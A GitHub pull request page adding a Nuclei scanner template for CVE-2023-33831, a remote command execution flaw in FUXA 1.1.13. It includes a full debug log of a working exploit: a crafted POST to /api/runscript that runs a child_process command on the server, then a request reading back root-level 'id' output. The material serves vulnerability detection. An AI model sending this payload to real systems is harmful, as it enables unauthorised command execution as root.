Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Create CVE-2023-33831.yaml #8301

Merged
merged 3 commits into from
Oct 3, 2023
Merged

Conversation

gy741
Copy link
Contributor

@gy741 gy741 commented Oct 1, 2023

Template / PR Information

Hello,

Added CVE-2023-33831

A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.

Template Validation

I've validated this template locally?

  • YES
  • NO
$ nuclei -t CVE-2023-33831.yaml -u http://127.0.0.1:1881 --debug

POST /api/runscript HTTP/1.1
Host: 127.0.0.1:1881
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Connection: close
Content-Length: 299
Content-Type: application/json
Accept-Encoding: gzip

{"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/2WAYViw731oJa8XfifgqrYSMSte')"}}}
[DBG] [CVE-2023-33831] Dumped HTTP response http://127.0.0.1:1881/api/runscript

HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Access-Control-Allow-Headers: x-access-token, x-auth-user, Origin, Content-Type, Accept
Access-Control-Allow-Methods: GET,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Sun, 01 Oct 2023 16:14:36 GMT
Etag: W/"f-BqamX8Agir75c+0ZN7SeQyFMRm0"
X-Powered-By: Express

"Script OK: ok"
[INF] [CVE-2023-33831] Dumped HTTP request for http://127.0.0.1:1881/_images/2WAYViw731oJa8XfifgqrYSMSte

GET /_images/2WAYViw731oJa8XfifgqrYSMSte HTTP/1.1
Host: 127.0.0.1:1881
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2023-33831] Dumped HTTP response http://127.0.0.1:1881/_images/2WAYViw731oJa8XfifgqrYSMSte

HTTP/1.1 200 OK
Connection: close
Content-Length: 51
Accept-Ranges: bytes
Access-Control-Allow-Headers: x-access-token, x-auth-user, Origin, Content-Type, Accept
Access-Control-Allow-Methods: GET,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=0
Content-Type: application/octet-stream
Date: Sun, 01 Oct 2023 16:14:36 GMT
Etag: W/"33-18aec052b1f"
Last-Modified: Sun, 01 Oct 2023 16:14:36 GMT
X-Powered-By: Express


00000000  75 69 64 3d 30 28 72 6f  6f 74 29 20 67 69 64 3d  |uid=0(root) gid=|
00000010  30 28 72 6f 6f 74 29 20  67 72 6f 75 70 73 3d 30  |0(root) groups=0|
00000020  28 72 6f 6f 74 29 2c 31  34 33 28 64 6f 63 6b 65  |(root),143(docke|
00000030  72 29 0a                                          |r).|
[CVE-2023-33831:word-1] [http] [critical] http://127.0.0.1:1881/_images/2WAYViw731oJa8XfifgqrYSMSte
[CVE-2023-33831:status-2] [http] [critical] http://127.0.0.1:1881/_images/2WAYViw731oJa8XfifgqrYSMSte

image

A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.

Signed-off-by: GwanYeong Kim <[email protected]>
@DhiyaneshGeek DhiyaneshGeek self-assigned this Oct 1, 2023
@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Oct 1, 2023
@pussycat0x
Copy link
Contributor

Hi @gy741 Thank you for sharing this template with the community and for your contribution to this project. Your efforts are greatly appreciated. Cheers!

@pussycat0x pussycat0x merged commit e13ab6c into projectdiscovery:main Oct 3, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Done Ready to merge
Projects
None yet
Development

Successfully merging this pull request may close these issues.

3 participants